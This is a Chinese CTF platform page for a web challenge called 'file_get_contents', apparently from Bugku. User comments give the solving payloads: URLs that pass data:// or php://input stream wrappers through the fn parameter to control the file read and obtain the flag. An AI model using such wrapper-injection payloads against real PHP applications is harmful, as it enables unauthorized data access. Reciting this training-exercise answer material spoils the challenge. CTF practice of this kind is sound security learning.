file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 3879
提  示:
描  述:
file_get_contents????
评论
2686213396 2天前

data伪协议

回复 0

zhuizhui 17天前

见到file_get_content 就要想到伪协议

回复 0

zengzhijing 18天前

http://117.72.52.127:18565/?fn=data://text/plain,test&ac=test

回复 0

Arya32f 2月前

https://blog.csdn.net/qq_52669977/article/details/143458470

回复 0

Pixelw 2月前

http://117.72.52.127:14185/?ac=bugku&fn=flag.txt

回复 0

nihaozy 2月前

http://117.72.52.127:10268/?ac=example&fn=data://text/plain,example

回复 0

6973lb 2月前

这值4金币?

回复 0

liuguowang75 3月前

/?ac=bugku&fn=flag.txt,想到flag文本了,没想到ac=bugku,哈哈

回复 0

HK1ng 3月前

file_get_contents常用来读文件,但是也可以用伪协议来控制读的内容,这里就是使用data://text/plain,test。指定数据的 MIME 类型位text,然后内容是test,这个时候我们就控制了读取的内容,只需要传参ac位test即可拿到flag。

回复 0

goodsnack 3月前

post ac=1&fn=php://input raw里填1,对应ac的值

回复 0

WriteUp

image
harry

3 金币

评分(5)

解题动态

sp521521 攻破了该题 3小时前
wyq55qyw 攻破了该题 17小时前
bugkukuxie 攻破了该题 20小时前
实力这块/.手拿把掐 攻破了该题 23小时前
suisdavid 攻破了该题 1天前
SD9ard3n 攻破了该题 1天前
gxrtbtc 攻破了该题 1天前
17361284606 攻破了该题 1天前
脱离派出所 攻破了该题 1天前
zap123 攻破了该题 2天前
2686213396 攻破了该题 2天前
BoPo 攻破了该题 3天前
likv300 攻破了该题 3天前
378546599 攻破了该题 3天前
414622150 攻破了该题 3天前
ankh 攻破了该题 3天前
pIge2 攻破了该题 4天前
Whisper0z 攻破了该题 4天前
dangfanchima 攻破了该题 4天前
goeasy 攻破了该题 4天前
问题反馈